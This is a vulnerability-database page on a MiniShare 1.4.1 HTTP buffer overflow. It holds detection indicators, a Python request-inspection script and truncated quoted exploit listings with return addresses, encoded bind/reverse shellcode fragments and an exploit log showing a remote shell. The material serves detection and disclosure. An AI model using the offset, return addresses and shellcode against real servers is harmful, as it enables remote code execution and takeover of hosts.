CVE-2004-2271
Published 2004-12-31
CVE-2004-2271: Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Priority P260 · high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 71.91% (99.3 percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minishare | minimal_http_server | <= 1.4.1 | — |
Detection & IOCs (extracted from sources)
Byte patterns quoted by the exploits indexed below (return addresses and shellcode fragments):
- bytes: `\xB8\x9E\xE3\x77` (also written `\xb8\x9e\xe3\x77`)
- bytes: `\x33\x55\xdc\x77`
- bytes: `\xf8\x29\xf3\x77`
- bytes: `0x7754a3ab`
- bytes: `0x7517f163`
- bytes: `0x71ab1d54`
- bytes: `0x71ab9372`
- bytes: `0x71c03c4d`
- bytes: `0x77f329f8`
- bytes: `0x77d5af0a`
- bytes: `0x77d4e26e`
- bytes: `\xEB\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF`
- bytes: `\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e`
- Exploit sends an oversized HTTP GET (or HEAD/POST) request of ~2220 bytes to port 80; the URI portion is padded with 1787 bytes of 'A' (0x41) followed by a 4-byte JMP ESP address. Detect abnormally large HTTP request lines to MiniShare.
- HEAD and POST methods are equally exploitable with the same 1787-byte padding offset; monitor for oversized HEAD/POST requests as well as GET.
- Payload bad characters for this exploit are null byte, colon, ampersand, question mark, percent, hash, space, LF, CR, forward slash, plus, vertical tab, backslash, and at-sign; shellcode in the wild will avoid these bytes.
- The exploit opens a bind shell on port 101 (exploit-db/616) or a reverse shell on port 4444 (exploit-db/636) after successful exploitation; monitor for unexpected inbound/outbound connections on these ports from the MiniShare process.
- The exploit uses a plain stack buffer overflow requiring a 'jmp esp' or 'push esp; ret' gadget address at offset 1787 in the HTTP request URI; a Snort/IDS rule should flag HTTP requests whose URI length exceeds 1800 bytes directed at MiniShare (default port 80).
- Only 210 bytes are available for shellcode after the overflow, and the known bad chars are 0x00 and 0x0d; encoded/XOR'd shellcode (e.g., XOR key 0x88) should be expected in traffic.
- Versions 1.3.4 and below are NOT vulnerable; focus detection on MiniShare versions 1.3.5 through 1.4.1.
- JMP ESP addresses are OS/SP-specific; the Metasploit module lists nine distinct return addresses across Windows 2000, XP, 2003, and NT targets, so a single static RET address will only work against one platform.
- The exploit may require timing adjustments (Sleep() calls) to succeed; a wrong offset or timing will crash MiniShare without code execution.
- The Metasploit payload space is only 1024 bytes with a required minimum of 64 NOPs and a stack adjustment of -3500; larger payloads will not fit.
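The detection notes above reduce to three traffic-level indicators: a request-target longer than the 1787-byte padding offset (the 1800-byte rule), a long run of a single filler byte in the request-target, and raw non-printable bytes where a URI should be percent-encoded ASCII. The following is an added example, not code from the page or from any of the indexed exploits, that checks those indicators over constructed sample requests; the thresholds `URI_LENGTH_THRESHOLD` and `FILLER_RUN_THRESHOLD` and all function names are assumptions chosen for this illustration, and the sample traffic is constructed, not captured.

```python
"""Flag HTTP request lines that match the MiniShare overflow indicators."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Thresholds are assumptions derived from the detection notes above, not
# MiniShare's own values: the exploit pads the request-target with 1787 bytes
# before the return address, so anything over 1800 bytes is anomalous for a
# small file-sharing server, and a 1000+ byte run of one value is the filler.
URI_LENGTH_THRESHOLD = 1800
FILLER_RUN_THRESHOLD = 1000


@dataclass
class Finding:
    method: str
    target_len: int
    reason: str


def parse_request_line(raw: bytes) -> Optional[Tuple[str, bytes, str]]:
    """Split the first line of a raw HTTP request into (method, target, version).

    Returns None when the line lacks at least a method and a target. The
    target stays as bytes because the raw content is exactly what we inspect.
    """
    first = raw.split(b"\n", 1)[0].rstrip(b"\r")
    parts = first.split(b" ")
    if len(parts) < 2 or not parts[0]:
        return None
    method = parts[0].decode("ascii", "replace")
    version = parts[2].decode("ascii", "replace") if len(parts) > 2 else ""
    return method, parts[1], version


def longest_byte_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value in data."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect_request(raw: bytes) -> Optional[Finding]:
    """Return a Finding when the request matches an overflow indicator, else None."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return Finding("?", len(raw), "unparseable request line")
    method, target, _ = parsed
    if len(target) > URI_LENGTH_THRESHOLD:
        return Finding(method, len(target),
                       f"request-target length {len(target)} exceeds {URI_LENGTH_THRESHOLD}")
    run = longest_byte_run(target)
    if run >= FILLER_RUN_THRESHOLD:
        return Finding(method, len(target),
                       f"request-target contains a {run}-byte filler run")
    # A legitimate request-target is printable ASCII (everything else is
    # percent-encoded); raw bytes outside 0x21..0x7e are what a return address
    # or encoded shellcode looks like on the wire.
    if any(b < 0x21 or b > 0x7E for b in target):
        return Finding(method, len(target), "request-target contains non-printable bytes")
    return None


def scan_requests(requests: List[bytes]) -> List[Finding]:
    """Run inspect_request over a batch and keep only the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


# Constructed sample traffic (not captured data): a benign GET, an oversized GET,
# a HEAD with the same padding but under the length threshold, a short POST
# carrying raw high bytes, and an unrelated OPTIONS request. The four bytes
# after the padding are the return-address value listed among the IOCs above.
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.1\r\nHost: fileshare\r\n\r\n",
    b"GET /" + b"A" * 1787 + b"\xb8\x9e\xe3\x77" + b"\x90" * 200 + b" HTTP/1.1\r\n\r\n",
    b"HEAD /" + b"A" * 1787 + b"\xb8\x9e\xe3\x77" + b" HTTP/1.1\r\n\r\n",
    b"POST /\x8b\xe4\x90 HTTP/1.0\r\n\r\n",
    b"OPTIONS * HTTP/1.1\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(f"{finding.method:<7} len={finding.target_len:<5} {finding.reason}")
```

The length rule alone misses the HEAD sample (1792 bytes of request-target, under 1800), which is why the filler-run check is kept as a second, independent indicator; a real deployment would tune both thresholds to the longest legitimate path the server is expected to serve.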
No detection rules found.
Exploit-DB
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
exploitdb · 2018-12-18 · CVSS 7.5 · CVE-2018-19862 [HIGH]
---
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal; both are exploited
in the same way. Only a 1-byte difference: GET = 3, HEAD and POST = 4 in length.
```text
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
```
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-05-09 · CVE-2004-2271
---
```ruby
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The indexed copy lost the text between '<' and '>' on the class line; the
# lines from the class declaration through 'Name' are the standard Metasploit 3
# module header, restored here so the fragment parses. The listing is truncated
# after the description, as it is on the page.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Minishare 1.4.1 Buffer Overflow',
      'Description' => %q{
          This is a simple buffer overflow for the minishare web
        server. This flaw affects all versions prior to 1.4.2. This
        is a plain stack buffer overflow that requires a "jmp esp" to reach
        the payload, making this difficult to target many platforms
        at once. This module has been successfully tested against
        1.4.1. Version
```
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb · 2004-11-16 · CVE-2004-2271
---
```c
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
/* nine #include lines follow in the original; the header names (written in
   angle brackets) were lost when the listing was indexed */
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
```
(listing truncated on the page)
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (1)
exploitdb · 2004-11-07 · CVE-2004-2271
---
```c
/*
MiniShare
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x
```
(listing truncated on the page)
Metasploit
Minishare 1.4.1 Buffer Overflow
This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html
- http://secunia.com/advisories/13114
- http://securitytracker.com/id?1012106
- http://sourceforge.net/project/shownotes.php?release_id=241158
- http://www.osvdb.org/11530
- http://www.securiteam.com/exploits/6X00B1PBPC.html
- http://www.securityfocus.com/bid/11620
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17978